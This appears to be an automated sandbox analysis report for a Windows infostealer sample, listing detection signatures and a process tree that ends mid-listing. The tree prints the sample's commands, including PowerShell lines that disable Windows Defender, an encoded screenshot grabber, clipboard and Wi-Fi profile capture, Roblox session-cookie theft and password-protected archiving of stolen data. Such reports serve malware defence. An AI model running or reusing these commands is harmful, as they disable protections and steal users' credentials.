Resubmissions

06-12-2024 18:32

241206-w6x7wa1kgz 10

Analysis

  • max time kernel
    147s
  • max time network
    156s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    06-12-2024 18:32

General

  • Target

    index.exe

  • Size

    6.9MB

  • MD5

    80236fbd0ecaa7214f958cf4ec1ea3df

  • SHA1

    21265ec65eeeed9dcad1f7a0d905bfffff6511b3

  • SHA256

    eb70095e4a754231f8bc995108e5e99af07d092c300cfbe1b2cf6362be9dc3a5

  • SHA512

    89976b720bc93ff671ae3f065c1186557c7a3d569d4bd79891cb513001de18ced0310410d7db930445e72e051d11c317f7218442f0583873b34224f83cdb5b78

  • SSDEEP

    196608:vqV1B5wB6ylnlPzf+JiJCsmFMvraJb1Qms:4CBRlnlPSa7mmvraMms

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 59 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 4 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 59 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\index.exe
    "C:\Users\Admin\AppData\Local\Temp\index.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2568
    • C:\Users\Admin\AppData\Local\Temp\index.exe
      "C:\Users\Admin\AppData\Local\Temp\index.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:472
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\index.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2644
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\index.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2712
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4620
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3692
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4036
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2416
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1000
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:5112
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4404
        • C:\Windows\system32\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
            PID:736
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2388
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
            4⤵
              PID:3936
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3260
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              • Suspicious use of AdjustPrivilegeToken
              PID:4668
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:408
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:1092
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\index.exe""
            3⤵
            • Hide Artifacts: Hidden Files and Directories
            • Suspicious use of WriteProcessMemory
            PID:2832
            • C:\Windows\system32\attrib.exe
              attrib +h +s "C:\Users\Admin\AppData\Local\Temp\index.exe"
              4⤵
              • Views/modifies file attributes
              PID:1512
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:460
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:2544
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2404
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:1600
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
            3⤵
              PID:3340
              • C:\Windows\System32\Wbem\WMIC.exe
                WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                4⤵
                  PID:1648
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                3⤵
                • Clipboard Data
                • Suspicious use of WriteProcessMemory
                PID:5064
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Get-Clipboard
                  4⤵
                  • Clipboard Data
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3404
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                  PID:3152
                  • C:\Windows\system32\tasklist.exe
                    tasklist /FO LIST
                    4⤵
                    • Enumerates processes with tasklist
                    PID:2716
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:3252
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:3452
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                      3⤵
                      • System Network Configuration Discovery: Wi-Fi Discovery
                      PID:3300
                      • C:\Windows\system32\netsh.exe
                        netsh wlan show profile
                        4⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:3680
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "systeminfo"
                      3⤵
                        PID:4828
                        • C:\Windows\system32\systeminfo.exe
                          systeminfo
                          4⤵
                          • Gathers system information
                          PID:2992
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                        3⤵
                          PID:1784
                          • C:\Windows\system32\reg.exe
                            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                            4⤵
                              PID:1696
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                            3⤵
                              PID:2928
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:2708
                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j4avav5m\j4avav5m.cmdline"
                                  5⤵
                                    PID:4500
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES853D.tmp" "c:\Users\Admin\AppData\Local\Temp\j4avav5m\CSCAAC46EA17B94448282375096A12B1FE2.TMP"
                                      6⤵
                                        PID:4716
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:1636
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:3436
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                      3⤵
                                        PID:2464
                                        • C:\Windows\system32\attrib.exe
                                          attrib -r C:\Windows\System32\drivers\etc\hosts
                                          4⤵
                                          • Drops file in Drivers directory
                                          • Views/modifies file attributes
                                          PID:2396
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                        3⤵
                                          PID:4404
                                          • C:\Windows\system32\attrib.exe
                                            attrib +r C:\Windows\System32\drivers\etc\hosts
                                            4⤵
                                            • Drops file in Drivers directory
                                            • Views/modifies file attributes
                                            PID:5092
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          3⤵
                                            PID:2416
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              4⤵
                                                PID:3936
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                              3⤵
                                                PID:4992
                                                • C:\Windows\system32\tree.com
                                                  tree /A /F
                                                  4⤵
                                                    PID:2204
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                  3⤵
                                                    PID:3716
                                                    • C:\Windows\system32\tasklist.exe
                                                      tasklist /FO LIST
                                                      4⤵
                                                      • Enumerates processes with tasklist
                                                      PID:3084
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                    3⤵
                                                      PID:2292
                                                      • C:\Windows\system32\tree.com
                                                        tree /A /F
                                                        4⤵
                                                          PID:2996
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                        3⤵
                                                          PID:4056
                                                          • C:\Windows\system32\tree.com
                                                            tree /A /F
                                                            4⤵
                                                              PID:4916
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                            3⤵
                                                              PID:332
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                4⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:2836
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                              3⤵
                                                                PID:4208
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                  4⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:4756
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "getmac"
                                                                3⤵
                                                                  PID:1648
                                                                  • C:\Windows\system32\getmac.exe
                                                                    getmac
                                                                    4⤵
                                                                      PID:1764
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI25682\rar.exe a -r -hp"relax" "C:\Users\Admin\AppData\Local\Temp\xxFFz.zip" *"
                                                                    3⤵
                                                                      PID:2104
                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI25682\rar.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\_MEI25682\rar.exe a -r -hp"relax" "C:\Users\Admin\AppData\Local\Temp\xxFFz.zip" *
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        PID:3092
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                      3⤵
                                                                        PID:4724
                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                          wmic os get Caption
                                                                          4⤵
                                                                            PID:912
                                                                        • C:\Windows\system32\cmd.exe
